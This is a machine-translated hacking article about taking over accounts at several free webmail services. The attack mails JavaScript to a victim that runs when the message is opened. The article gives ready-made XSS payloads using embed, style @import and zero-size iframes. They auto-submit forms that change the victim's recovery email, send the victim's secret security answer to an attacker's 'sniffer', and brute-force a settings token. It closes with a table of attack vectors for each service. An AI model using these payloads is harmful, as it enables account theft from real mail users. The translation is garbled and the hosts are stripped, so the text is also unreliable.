This page has been robot translated, sorry for typos if any. Original content here.


We continue to deal with web-mail. I conducted a small study of various services for hacking and I bring to your attention the results. The technology of attack remains the same: an email with a JavaScript-code sent to someone else's address is sent, which works when the message is opened, and changes some information in the user box settings. There is no point in describing each server in detail, since the approach is the same everywhere, so I will give some examples, and at the end - a table. In most cases, hacking can be considered 100%, with some assumptions: the user must use the web-interface for reading letters, when writing exploits I was guided by a standard platform, that is, I initially assume that the user does not have any exotic OS or browser with JS execution disabled.


I'll start with mail number 1 in Russia. At the moment, through the skipping of JavaScript and one developer error, breaking this box can be done. I believe that the basic principles are well known. How to get a password? 1 - to change it unauthorized. Do not pass, you need to know the previously established. 2 - to change the secret question and use the service to combat amnesia. Also will not work. 3 - set up your alternate Email to get the new password generated by the system on it. It does not work out, the last two options listed above are in the same form and are also password protected. Even the rest, representing for us less interest settings (Name, Surname, etc.) now without entering the current password will not be able to change. It would seem that there are no options. However, there is such a secondary, inconspicuous section of the "Contact Information" settings (ICQ, website, phone, work place, time zone, etc.). In this section, you can also specify a contact email. The trick is that at the same time in the registration information the alternative address changes but that which is registered in the questionnaire, and now you can get a password for soap using the reminder service. It's simple. URL: truth of the GET method is that the settings in the box can not be changed now, so I'll describe in detail the technical side of the question.

I. We send to the desired box a letter with a code that will generate a frame directly in the body of the message with a link to our site. If possible, the script should work without any user input (click, click, mouseover, image upload, etc.):

 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //> </ iframe>'; this.wav">
 <p id = 'xxx'>
In order to completely ensure the functionality of the script, as well as disguise, we convert:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = 'iframe src = http: // width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
In this form, the character codes replace the letters in the names of the javascript and iframe elements, and the mail script does not filter them. The status = location line; Creates the visibility of the local URL in the status bar so that no outside flicker arouses suspicion. The width and height attributes of both the frame and embed are set to zero, and make them invisible.

II. On the resource we have an HTML document with a form for sending the changed data to the server.

The contents of yourscript.html:
 <form method = "post" action = "" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = ""> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Notes: the work of the client part of the script in an unchanged form is guaranteed only for IE; The form of sending is posted on a separate site specifically to "unload" the letter.


Now a slightly different security error, for example If you use the password reminder service, then to get it, you just need to enter the correct answer to the secret question (one of the options). So we set ourselves the task of getting this answer. This is done easily. When I went into the properties of the mailbox and looked through the registration information, I saw that the answer to the secret question is not hidden, which allows us to use JavaScript to interpret its value.

We implement the script through the style tag.
Address of the page with the settings:
Form name: profileform
The name of the text field with a secret response: hint_a
In the end, to steal a secret question, you need to call up the settings page, run JavaScript, get the value of document.profileform.hint_a.value, and pass it to the sniffer along with the environment variable REQUEST_UR I.

Ready-made version:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: // name = 'zero'% 6FnLoad = `str =; path = 'http: //'; = path + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
In the generated frame with the name zero, the settings page is loaded. At the end of the download, the OnLoad handler starts the script for reading the secret question, and then, through the same frame, sends a response to the sniffer. Now it's enough to go to, and find the necessary information in the "Host" line .


In my opinion, a fairly popular postman, so I'll tell you about it in detail. Moreover, it is much easier to take possession of another's account than it seems at first sight. You can do this: send a message with a script that will receive session id at startup, generate the necessary queries, and change the settings of the altrenrative email (to which the password is subsequently sent) and the secret question and answer. However, if you specify any other address with a reminder, the password will be sent to it, so long as the secret answer is correct. And the following observation: session id for changing the settings can not be used at all. Plus, all tags are allowed. All of the above reduces the amount of code to a couple of lines:
 <iframe src = http: // cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe> 


The method of hacking somewhat does not fit into the general theme of the article, but still - mail :) . When I needed to get a password from one box, I registered my account as usual and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer, without entering the old password. The usual action plan is to check the filtering of tags, get the ID and execute the query. However, to change the settings used a special variable utoken, which is contained in the body of the document. After experimenting with the change of the question and the answer with the previously known utoken:ВОПРОС&panswer=ОТВЕТ I have come to the conclusion that ID and cookies for changing the settings are not required. In this case, after monitoring utoken, it was found that the four-digit hexadecimal number after the email address lies in a very narrow range. Namely, to establish a secret question with the answer on any box of interest to us, you need to go through just 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we will get into the desired box.

Notes: at the moment there have been some changes. Password recovery service does not work, so it is advisable to change it immediately. The address of the configuration change has also changed:ВОПРОС&panswer=ОТВЕТ The method does not work forever. Probably, all the same it is required that the user from time to time go into the mail through the web .

Table with characteristics of free WWW-servers

img src = javascript: Allows you to read the password from the settings page from the password field , , ,
embed src = javascript: You can change an alternate email , , , and others.
@ import url (javascript:); The settings show the answer to the security question , , ,
In any way Read / change the question and answer. The password is valid and
the same postman. about 80 domains
img src = javascript:, style = background: url (javascript:) You can steal an answer to a secret question, if it is installed. It is also possible to set the address for forwarding (copies are not saved) OnError, OnLoad Removing the site * (JS is not required) embed src = javasc
ript: this .wav>
Read the answer to your security question , , , , , , ,
embed src = "javascript: Change / steal the answer to your security question , , , , and others.
In many ways Account deleting embed src = javascript: Read secret answer